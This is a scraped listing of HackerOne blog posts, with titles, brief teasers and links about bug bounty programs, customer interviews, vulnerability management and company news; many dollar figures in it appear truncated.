Hyatt's three-year-old bug bounty program has reached a significant milestone: 0,000 in bounties paid to hackers. As the first organization in the hospitality industry to embrace hacker-powered security, Hyatt's milestone today demonstrates its long-term commitment to setting the highest standard for cybersecurity. We sat down with Robert Lowery, Senior Analyst at Hyatt, to learn more about the history of Hyatt's bug bounty program and their most recent 0,000 milestone. Read on to see what Robert shared on how the knowledge of the global security researcher community helps Hyatt reduce risk, enable security improvements, and ultimately, deliver on their promise to care for employees, guests, and shareholders alike so they can be their best.
https://www.hackerone.com/bounty/hyatts-bug-bounty-program-update-qa-senior-analyst-robert-lowery
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why security transparency makes for good corporate governance

https://www.hackerone.com/resources/wistia-webinars/blackhat-marten-mickos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

One Month of Learnings from Flo Health's Bug Bounty Program: A Q&A with CISO, Leo Cunningham

https://www.hackerone.com/vulnerability-management/one-month-learnings-flo-healths-bug-bounty-program-qa-ciso-leo-cunningham
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Assessment I A Complete Guide

https://www.hackerone.com/vulnerability-management/vulnerability-assessment-i-complete-guide
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What We Can Learn From Recent Ransomware Attacks

https://www.hackerone.com/vulnerability-management/what-we-can-learn-recent-ransomware-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Use HackerOne and PagerDuty to Identify When Vulnerabilities Need Action

https://www.hackerone.com/vulnerability-management/how-use-hackerone-and-pagerduty-identify-when-vulnerabilities-need-action
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Are Bug Bounties? How Do They Work? [With Examples]

https://www.hackerone.com/vulnerability-management/what-are-bug-bounties-how-do-they-work-examples
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How the Industry's First Hacker-Powered API Helps Hackers Automate Workflows

https://www.hackerone.com/application-security/how-industrys-first-hacker-powered-api-helps-hackers-automate-workflows
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How HackerOne Positively Influences Zebra's Software Development Life Cycle

https://www.hackerone.com/vulnerability-management/zebra-secure-development-lifecycle
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty vs. CTF [Understanding Differences & Benefits]
Trying to understand the difference between a bug bounty vs. CTF? We explain the differences, the similarities, and the benefits of each.
https://www.hackerone.com/community-blog/bug-bounty-vs-ctf-understanding-differences-benefits
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bug Bounty vs. Penetration Testing: Differences Explained

https://www.hackerone.com/penetration-testing/bug-bounty-vs-penetration-testing-differences-explained
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne in DevSecOps

https://www.hackerone.com/vulnerability-disclosure/hackerone-devsecops
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What is Vulnerability Scanning? [And How to Do It Right]

https://www.hackerone.com/vulnerability-management/what-vulnerability-scanning-and-how-do-it-right
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HOW HACKERONE AND GITHUB NOW WORK BETTER TOGETHER

https://www.hackerone.com/vulnerability-management/how-hackerone-and-github-now-work-better-together
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Citrix's Hacker-Powered Security Growth Plan: Q&A with Abhijith Chandrashekar

https://www.hackerone.com/vulnerability-management/citrixs-hacker-powered-security-growth-plan-qa-abhijith-chandrashekar
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Hackers Can Help Reduce Your Organization's Application Risk on AWS

https://www.hackerone.com/vulnerability-management/how-hackers-can-help-reduce-your-organizations-application-risk-aws
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Penetration Testing? How Does It Work Step-by-Step?

https://www.hackerone.com/penetration-testing/what-penetration-testing-how-does-it-work-step-step
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

60 Days of Insights from the DOD's Defense Industrial Base Vulnerability Disclosure Program Pilot

https://www.hackerone.com/vulnerability-management/60-days-insights-dods-defense-industrial-base-vulnerability-disclosure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ANNOUNCING HACK THE ARMY 3.0 RESULTS: A CONVERSATION WITH DEFENSE DIGITAL SERVICE, U.S. ARMY, AND HACK THE ARMY 3.0'S TOP HACKER

https://www.hackerone.com/blog/announcing-hack-army-30-results-conversation-defense-digital-service-us-army-and-hack-army
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

BUILD A RESILIENT SECURITY POSTURE WITH VULNERABILITY INTELLIGENCE AND CYBERSECURITY RATINGS

https://www.hackerone.com/vulnerability-management/build-resilient-security-posture-vulnerability-intelligence-and
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HACK HARD. HAVE FUN. INCREASE SECURITY

https://www.hackerone.com/community-blog/hack-hard-have-fun-increase-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HOW DIGITAL TRANSFORMATION CHANGES AN ORGANIZATION'S SECURITY CHALLENGES

https://www.hackerone.com/vulnerability-management/how-digital-transformation-changes-organizations-security-challenges
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MICROSOFT SAYS: RUSSIAN SOLARWINDS HACKERS HIT U.S. GOVERNMENT AGENCIES AGAIN

https://www.hackerone.com/vulnerability-management/microsoft-says-russian-solarwinds-hackers-hit-us-government-agencies-again
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Spotlight on the Server-Side
Server-side request forgery (or SSRF) vulnerabilities are particularly dangerous because they can lead to total system compromise. Discover where they're most common, explore real-world examples, and learn prevention tips from hackers.
https://www.hackerone.com/application-security/spotlight-server-side
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Secrets of a Mature Vulnerability Management Program from Costa Coffee and Priceline
During HackerOne's recent series of webinars, we caught up with Matt Southworth, CISO of Priceline, and Matt Adams, Global Security Architect at Costa Coffee, to learn their 5 secrets to building a highly effective vulnerability management program.
https://www.hackerone.com/vulnerability-management/5-secrets-mature-vulnerability-management-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Security Engineer and Hacker Share Their Experiences with Security Assessments
A few weeks ago, HackerOne and PortSwigger teamed up to shine a light on the innovative ways that customers and security analysts are scaling risk assessments. Read on for key learnings.
https://www.hackerone.com/ethical-hacker/security-engineer-and-hacker-share-their-experiences-security-assessments
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Saxo Bank Celebrates One Year of Bug Bounties: Q&A with CISO Mads Syska Hasling

https://www.hackerone.com/vulnerability-management/saxo-bank-celebrates-one-year-bug-bounties-qa-ciso-mads-syska-hasling
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How HackerOne Helps the Vulnerability Management Process
HackerOne sees vulnerability management as a process combining software tools and security analyst actions to reduce risk. In many cases, successful Vulnerability Management requires a joint effort between security operations, who find vulnerabilities, and IT operations responsible for fixing, or patching, vulnerabilities.
https://www.hackerone.com/vulnerability-management/how-hackerone-helps-vulnerability-management-process
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reddit's Bug Bounty Program Kicks Off: Q&A with Reddit's Allison Miller and Spencer Koch, and Top Program Hacker @RENEKROKA
HackerOne sat down with Reddit's CISO and VP of Trust, resident Security Wizard, and top hacker to discover the secrets to Reddit's bug bounty success, explore their goals and key results, delve into how they use hackers to scale security across software development, and gain a unique perspective about what it's like to hack one of the world's leading social networks.
https://www.hackerone.com/application-security/reddits-bug-bounty-program-kicks-qa-reddits-allison-miller-and-spencer-koch
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Security@ 2021 Call for Speakers is Open
HackerOne's global hacker-powered security conference, Security@, is back for its fifth year. This year's virtual event will take place September 20, 2021. The call for speakers is now open! You have until May 15, 2021, to submit your talk.
https://www.hackerone.com/company-news/security-2021-call-speakers-open
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Rise of IDOR
Insecure Direct Object References (or IDOR) is a simple bug that packs a punch. Discover where they're most common, explore real-world examples, and learn prevention tips from hackers.
https://www.hackerone.com/company-news/rise-idor
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PayPal is our Virtual Pal
HackerOne's second virtual live hacking event with event partners, PayPal to share experiences from the event.
https://www.hackerone.com/vulnerability-management/paypal-our-virtual-pal
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Commerce Giant Shopify Kicks Off 2021 with HackerOne (Virtual) Live Hacking Event: h1-2102
HackerOne's first virtual live hacking event of the year kicked off with Shopify in January 2021. Read this blog post to learn more about how Shopify builds relationships with hackers through live events like h1-2102, and find out who the award winners are.
https://www.hackerone.com/community-blog/commerce-giant-shopify-kicks-2021-hackerone-virtual-live-hacking-event-h1-2102
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Rise of Misconfiguration and Supply Chain Vulnerabilities
The vulnerability of supply chains has been top of mind since the SolarWinds attack, which still dominates headlines, but last week's Singtel breach also reflects the rise of breaches triggered by misconfiguration vulnerabilities.
https://www.hackerone.com/vulnerability-management/rise-misconfiguration-and-supply-chain-vulnerabilities
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2020 Hacker Community Year in Review
From CTF's to virtual live hacking events and more, check out this recap of the initiatives HackerOne hosted for the hacker community in 2020.
https://www.hackerone.com/community-blog/2020-hacker-community-year-review
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing The Hacker of The Hill

https://www.hackerone.com/ethical-hacker/announcing-hacker-hill
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Learnings From A Conversation With OP Financial Group's CISO And @mrtuxracer
On 20 January, HackerOne's CEO, Marten Mickos, sat down for a chat with European hacker, Julien Ahrens a.k.a @mrtuxracer, and Teemu Ylhäisi, CISO at OP Financial Group. The discussion ranged from the recent SolarWinds attacks to the best way to prevent phishing. Here are our top takeaways from the webinar.
https://www.hackerone.com/application-security/5-learnings-conversation-op-financial-groups-ciso-and-mrtuxracer
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LINE on Securing the Application Development Lifecycle with Bug Bounties
HackerOne has a large hacker community and the platform necessary to operate LINE's bug bounty program. By using HackerOne's platform and welcoming the community, LINE can increase operational efficiency. Through the partnership with HackerOne, we can share new bugs and learn from the vulnerability trends on the Platform while also getting a guide that helps us create a successful bug bounty program.
https://www.hackerone.com/application-security/line-securing-application-development-lifecycle-bug-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Years of AWS Hacking Tells Us About Building Secure Apps
Years of AWS bug bounties have exposed SSRF vulnerabilities, misconfigurations, and dangling DNS records. What can we learn from these vulnerabilities about mitigating risk?
https://www.hackerone.com/application-security/what-years-aws-hacking-tells-us-about-building-secure-apps
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Grab Celebrates 5 Years on HackerOne
"Just five years ago, leading rideshare, food delivery, and payments company Grab, became one of the first companies in Southeast Asia to implement a hacker-powered security program. In just three years Grab became one of the Top 20 bug bounty programs on HackerOne worldwide."
https://www.hackerone.com/company-news/grab-celebrates-5-years-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Policies Update
HackerOne's Policies Received Updates - check them out now!
https://www.hackerone.com/company-news/hackerone-policies-update
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The World's Largest Live Hacking Event
HackerOne and The Paranoids partnered to bring you the largest live hacking event in the world
https://www.hackerone.com/community-blog/worlds-largest-live-hacking-event
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Quantifying Risk: How do you measure success in security?
When your job is all about avoiding costly incidents and mistakes, it's hard to put a dollar value on your work. At HackerOne's recent Security@ conference, Slack and Hyatt's CISOs sat down for a chat about their challenges and the hacks they use to quantify risk:
https://www.hackerone.com/application-security/quantifying-risk-how-do-you-measure-success-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

12 Days of Hacky Holidays CTF

https://www.hackerone.com/ethical-hacker/12-days-hacky-holidays-ctf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VDPs are at the Heart of the Australian Cyber Security Centre's Recommendations

https://www.hackerone.com/vulnerability-management/vdps-are-heart-australian-cyber-security-centres-recommendations
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Joins AWS Marketplace as Cloud Vulnerabilities Rise
HackerOne reveals the most common and critical vulnerabilities found in cloud infrastructure and announces its debut in AWS Marketplace.
https://www.hackerone.com/application-security/hackerone-joins-aws-marketplace-cloud-vulnerabilities-rise
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing the HackerOne Brand Ambassadors
Announcing the first group of Hacker Brand Ambassadors who will lead hackers in their local area.
https://www.hackerone.com/community-blog/announcing-hackerone-brand-ambassadors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US Government Mandates Vulnerability Disclosure for IoT

https://www.hackerone.com/vulnerability-management/us-government-mandates-vulnerability-disclosure-iot
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing new leaderboards: More ways to engage, compete and win

https://www.hackerone.com/ethical-hacker/announcing-new-leaderboards-more-ways-engage-compete-and-win
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne is Excited to Launch Triage Ratings for Customers and Hackers

https://www.hackerone.com/application-security/hackerone-excited-launch-triage-ratings-customers-and-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NIST Overhauls “Security and Privacy Controls” and Emphasizes VDP as a Best Practice

https://www.hackerone.com/security-compliance/nist-overhauls-security-and-privacy-controls-and-emphasizes-vdp-best-practice
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Snap's Security Team on Nearly 6 Years of Collaborating with Hackers

https://www.hackerone.com/vulnerability-management/snaps-security-team-nearly-6-years-collaborating-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Organizations Paid Hackers .5 Million for These 10 Vulnerabilities in One Year
HackerOne report reveals cross-site scripting, improper access control, and information disclosure top list of most common and impactful vulnerabilities
https://www.hackerone.com/ethical-hacker/organizations-paid-hackers-235-million-these-10-vulnerabilities-one-year
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Expands Integrations Ecosystem to Connect and Defend Customers

https://www.hackerone.com/vulnerability-management/hackerone-expands-integrations-ecosystem-connect-and-defend-customers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Integrates with ServiceNow to Streamline Vulnerability Lifecycle Management
We're excited to announce our integration with ServiceNow Incident Management. This integration allows customers to escalate vulnerability reports with ServiceNow incidents and synchronize any updates in the vulnerability workflow that happen in ServiceNow or HackerOne.
https://www.hackerone.com/vulnerability-management/hackerone-integrates-servicenow-streamline-vulnerability-lifecycle
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AT&T Celebrates Million Awarded to Hackers in One Year
AT&T recently celebrated its first anniversary on HackerOne, passing million in payouts to more than 850 researchers worldwide. Read on to learn more about their program and successes over the last year.
https://www.hackerone.com/ethical-hacker/att-celebrates-1-million-awarded-hackers-one-year
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Introducing the 4th Annual Hacker-Powered Security Report

https://www.hackerone.com/ethical-hacker/introducing-4th-annual-hacker-powered-security-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1-2010 FAQ's
FAQ's from HackerOne's biggest virtual live hacking event with The Paranoids from Verizon Media, H1-2010.
https://www.hackerone.com/company-news/h1-2010-faqs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerability Disclosure is Now Mandatory for Federal Agencies - Here's How to Make it Happen

https://www.hackerone.com/vulnerability-management/vulnerability-disclosure-now-mandatory-federal-agencies-heres-how-make-it
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Smartsheet Celebrates One Year with HackerOne
To mark Smartsheet's one-year anniversary with HackerOne, we sat down with Nolan Gibb, Information Security Engineer at Smartsheet, to discuss how bug bounties enable his team to scale and collaborate with software developers to create more secure products.
https://www.hackerone.com/vulnerability-management/smartsheet-celebrates-one-year-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HackerOne Rolls Out Pentest Review System for Customers and Pentesters

https://www.hackerone.com/penetration-testing/hackerone-rolls-out-pentest-review-system-customers-and-pentesters
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Are Election Hacking Fears Driving Voters To The Polls?
If people fear that the American electoral infrastructure could be hacked, will they withhold their votes in November? Not according to research commissioned by HackerOne.
https://www.hackerone.com/company-news/are-election-hacking-fears-driving-voters-polls
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Become a HackerOne Brand Ambassador
Announcing the Hacker Brand Ambassador Program: lead hackers in your city, get exclusive perks, further your career.
https://www.hackerone.com/company-news/become-hackerone-brand-ambassador
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

National University of Singapore Taps Students to Hack for Good
In an inaugural InterUni Bug Bounty Challenge jointly organized by the National University of Singapore (NUS) and Singapore Management University (SMU) from 12 August to 9 September 2020, students and staff from the two universities will get to hone their hacking skills by looking for vulnerabilities (or ‘bugs') across the digital assets of their respective universities in exchange for monetary rewards, or bounties. To kick off the InterUni Bug Bounty Challenge, we sat down with NUS Chief Information Technology Officers Tommy Hor to learn more about the Challenge, why cybersecurity is so important to educational institutions like NUS, and more.
https://www.hackerone.com/ethical-hacker/national-university-singapore-taps-students-hack-good
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Recap of h@cktivitycon 2020
HackerOne's first-ever hacker conference, h@cktivitycon streamed from Twitch on Friday, July 31st - August 1st, 2020 recapped in this blog post.
https://www.hackerone.com/ethical-hacker/recap-hcktivitycon-2020
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Adobe and HackerOne Celebrate Five Years of Continued Collaboration
To celebrate five years with HackerOne, we sat down with Adobe's Senior Security Program Manager Pieter Ockers to discuss how their program has evolved over the last five years and the role that hacker-powered security, both bug bounties and response programs, plays into their overall security strategy. 
https://www.hackerone.com/company-news/adobe-and-hackerone-celebrate-five-years-continued-collaboration
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

COVID Confessions of a CISO
The COVID-19 crisis has shifted life online. As companies rush to meet remote work requirements and customer demands for digital services, attack surfaces have dramatically expanded, leaving security teams stretched thin and not staffed to cope. HackerOne dug into this concept to identify COVID-19 impacts on security and business. Read on for our findings.
https://www.hackerone.com/company-news/covid-confessions-ciso
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Human vs. Machine: Three-Part Virtual Series on the Human Element of AppSec

https://www.hackerone.com/ethical-hacker/human-vs-machine-three-part-virtual-series-human-element-appsec
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing video streaming in sub-Saharan Africa
Maintaining a video streaming service across the whole of Africa is challenge enough, without the added pressure of potential security issues. Showmax turns to hackers to secure their customer data and protect the security of their shows and movies.
https://www.hackerone.com/application-security/securing-video-streaming-sub-saharan-africa
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Security@ 2020 Call for Speakers is Open
HackerOne's global hacker-powered security conference, Security@, is back for its fourth year. This year's virtual event will take place October 20-22, 2020. The call for speakers is now open! You have until August 21, 2020, to submit your talk.
https://www.hackerone.com/company-news/security-2020-call-speakers-open
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Costa Coffee prepares for global expansion with bug bounty program
As the coffee chain prepares for global expansion, Costa Coffee joins the likes of Hyatt, Deliveroo, and Zomato in launching its first private bug bounty program. Costa Coffee will shore up its digital defenses using the combined expertise and experience of HackerOne's hacker community.
https://www.hackerone.com/application-security/costa-coffee-prepares-global-expansion-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Warm Welcome To Our New SVP of Customer Success
We are delighted to announce that Amanda Berger — former Chief Customer Officer at Lucidworks — has joined HackerOne as our new SVP of Customer Success. In this article, Amanda introduces herself and shares what she hopes to achieve at HackerOne.
https://www.hackerone.com/company-news/warm-welcome-our-new-svp-customer-success
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Pentesting basics video series launched on Hacker101
Learn the basics of pentesting to further your career and develop core competencies required in one of the hottest job markets in cybersecurity: Penetration testing.
https://www.hackerone.com/ethical-hacker/pentesting-basics-video-series-launched-hacker101
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity Vendor Consolidation: Securing More with Less
Discover how hacker-powered security solutions can help identify the gaps and consolidate point-solution tools into a single platform for easier management and measured ROI.
https://www.hackerone.com/company-news/cybersecurity-vendor-consolidation-securing-more-less
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Visma's Ioana Piroska on Securing the Development Lifecycle Through Bug Bounties
Having recently taken their bug bounty program public, we caught up with Visma Security Analyst Ioana Piroska about the program's results so far and Visma's plans for the future.
https://www.hackerone.com/application-security/vismas-ioana-piroska-securing-development-lifecycle-through-bug-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Pentesting Beyond Compliance: A Tool to Improve Your Security Posture

https://www.hackerone.com/penetration-testing/pentesting-beyond-compliance-tool-improve-your-security-posture
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Juneteenth Means at HackerOne

https://www.hackerone.com/company-news/what-juneteenth-means-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reputation, Signal & Impact Calculation Enhancements
Reputation, Signal and Impact changes and how this will affect hacker stats going forward.
https://www.hackerone.com/ethical-hacker/reputation-signal-impact-calculation-enhancements
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mail.ru Group pays out over million in bounties

https://www.hackerone.com/ethical-hacker/mailru-group-pays-out-over-1-million-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mayonaise Joins The Ranks of The Seven-Figure-Earning Hackers
Congratulations to @mayonaise, the ninth hacker to earn Million hacking for good on the HackerOne platform! Read on for more about his unique approach, focus, and journey to being one of the top hackers in the world.
https://www.hackerone.com/ethical-hacker/mayonaise-joins-ranks-seven-figure-earning-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Celebrating Pride at HackerOne

https://www.hackerone.com/company-news/celebrating-pride-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What to Look For in a Penetration Testing Company
Penetration testing is one of the most widely used techniques to comply with security regulations and protect network and computing systems and users. Hacker-powered penetration tests are emerging as a more cost-effective way to harden applications. With HackerOne Challenge, selected hackers from our community are invited to find vulnerabilities in your systems, and you only pay for the verified vulnerabilities found.
https://www.hackerone.com/vulnerability-management/what-look-penetration-testing-company
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Announcing the PlayStation Bug Bounty Program
Today, PlayStation launched a public bug bounty program on HackerOne because the security of their products is a fundamental part of creating amazing experiences for the PlayStation community. Read on to learn more about their program, bounties, and more.
https://www.hackerone.com/application-security/announcing-playstation-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Juneteenth: HackerOne's Day for Action

https://www.hackerone.com/company-news/juneteenth-hackerones-day-action
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scaling & Prioritizing Product Security with Zendesk
In a recent virtual roundtable, we sat down with Scott Reed, Senior Manager of Product Security at Zendesk, to discuss how they incorporate bug bounties throughout their product security strategy and scaling security at a high-growth organization. Take a look at some of the highlights of our conversation below.
https://www.hackerone.com/application-security/scaling-prioritizing-product-security-zendesk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How does Pentesting fit into your overall security strategy?
As digital technologies and data transform the way business gets done, a cybersecurity strategy is fundamental in helping your company save time and money while protecting your brand. How should organizations think about penetration testing within their overall security strategy?
https://www.hackerone.com/penetration-testing/how-does-pentesting-fit-your-overall-security-strategy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

h1-2006 CTF
h1-2006 CTF Winner Announcement
https://www.hackerone.com/ethical-hacker/h1-2006-ctf
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Crowdsourcing Racial Justice and Equality

https://www.hackerone.com/company-news/crowdsourcing-racial-justice-and-equality
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

There is no room for racism or inequality here.
At HackerOne we say No to racism. We are here to democratize opportunity across the world. We believe in the aspirations and possibilities of every human being. Hacker-powered security is proof that by working together across all boundaries we accomplish what otherwise would remain unachievable.
https://www.hackerone.com/ceo/there-no-room-racism-or-inequality-here
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

100 Hacking Tools and Resources
As part of our 0 Million in bounties celebration, we want to share a list of 100 tools and resources that will help hackers continue hacking!
https://www.hackerone.com/ethical-hacker/100-hacking-tools-and-resources
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Journey in Data: HackerOne Hits 100 Million Dollars in Bounties
Yesterday, hackers on HackerOne hit a major milestone: they have earned a total of 0 million in bounties over the past 8 years, with nearly half in the past year alone! Let's take a look at some of the numbers that have taken us to the 0 million milestone.
https://www.hackerone.com/ethical-hacker/journey-data-hackerone-hits-100-million-dollars-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

0 Million Paid - One Billion in Sight for Hackers
Today we celebrate with all our hackers the phenomenal milestone of a hundred million dollars in bounties. Hack for Good! Yet we should know that we are only getting going. The digital world is not safe and secure yet. Much more work awaits us. We have one hundred million more bugs to find.
https://www.hackerone.com/ceo/100-million-paid-one-billion-sight-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Thanks For Being Part Of The Journey to 0 Million in Bounties!
Reaching 0 Million in bounties is a reason to celebrate what this community has achieved. It also gave us a chance to reflect on the journey to this point and the enduring values that will get us to the next milestone.
https://www.hackerone.com/ethical-hacker/thanks-being-part-journey-100-million-bounties
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

10 Ways to Hack Your “New Normal” Workweek
As a company inspired by hackers, HackerOne is taking this unique time to hack our programs to provide our people with additional support to ensure the wellbeing of all Hackeronies and their families. Here's a peek at the fun programs and perks we've implemented at HackerOne based on input from our people.
https://www.hackerone.com/company-news/10-ways-hack-your-new-normal-workweek
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Federal Agencies Use Vulnerability Disclosure Policies to Level Up Security

https://www.hackerone.com/vulnerability-management/how-federal-agencies-use-vulnerability-disclosure-policies-level-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Security by the People: Announcing HackerOne's FedRAMP Authorization
Since 2016, we've been proud to help secure critical U.S. Department of Defense and GSA applications. As we achieve FedRAMP Tailored Authorization, we are excited to expand this important work.
https://www.hackerone.com/vulnerability-management/security-people-announcing-hackerones-fedramp-authorization
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stay Ahead of Threats With Hacker-Powered Retesting
Introducing Hacker-Powered Retesting! Retesting is designed to scale with capabilities to keep your critical assets safe from increasingly sophisticated attacks.
https://www.hackerone.com/vulnerability-management/stay-ahead-threats-hacker-powered-retesting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PayPal on Creating Strong Relationships with Security Researchers

https://www.hackerone.com/application-security/paypal-creating-strong-relationships-security-researchers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers take on San Francisco for the 4th Year in a Row
HackerOne hosted its first flagship event of the year with Verizon Media in San Francisco.
https://www.hackerone.com/ethical-hacker/hackers-take-san-francisco-4th-year-row
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Shopify Celebrates 5 Years on HackerOne

https://www.hackerone.com/vulnerability-management/shopify-celebrates-5-years-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackweek: An insider's look at HackerOne culture

https://www.hackerone.com/ethical-hacker/hackweek-insiders-look-hackerone-culture
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Slack Increases Bounty Minimums For the Next 90 Days

https://www.hackerone.com/application-security/slack-increases-bounty-minimums-next-90-days
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Live Hacking Goes Virtual

https://www.hackerone.com/ethical-hacker/live-hacking-goes-virtual
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hack for Good: Easily Donate Bounties to WHO's COVID-19 Response Fund
Collaboration and bounty splitting have been possible for years, and now you can easily donate bounties by adding the user “hackforgood” as a collaborator to a report submission on HackerOne.
https://www.hackerone.com/ethical-hacker/hack-good-easily-donate-bounties-whos-covid-19-response-fund
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Six years of the GitHub Security Bug Bounty program

https://www.hackerone.com/application-security/six-years-github-security-bug-bounty-program
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Live hacking the U.S. Air Force, UK Ministry of Defence and Verizon Media in Los Angeles at h1-213
HackerOne hosted its final flagship live hacking event of 2019 in Los Angeles, CA
https://www.hackerone.com/ethical-hacker/live-hacking-us-air-force-uk-ministry-defence-and-verizon-media-los-angeles-h1-213
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

My Career Just Got Hacked: Rana Robillard Joins HackerOne

https://www.hackerone.com/my-career-just-got-hacked-rana-robillard-joins-hackerone
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Live Hacking Events | 2019 Recap and the Road Ahead
A look at where we've been and where we're going in 2020...
https://www.hackerone.com/ethical-hacker/live-hacking-events-2019-recap-and-road-ahead
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Confessions of European CISOs
Ever wondered what's been keeping your CISO up at night? Well, wonder no more. We did some research to find out what worries European CISOs who are tasked with shoring up their digital infrastructure.
https://www.hackerone.com/company-news/confessions-european-cisos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LINE Security Bug Bounty Program Report 2019

https://www.hackerone.com/application-security/line-security-bug-bounty-program-report-2019
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Congratulations, Cosmin! The world's seventh million-dollar bug bounty hacker
The ranks of seven-figure-earning hackers have now risen to eight. Meet @inhibitor181 — the world's seventh million-dollar bug bounty hacker.
https://www.hackerone.com/ethical-hacker/congratulations-cosmin-worlds-seventh-million-dollar-bug-bounty-hacker
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Dropbox bug bounty program has paid out over ,000,000

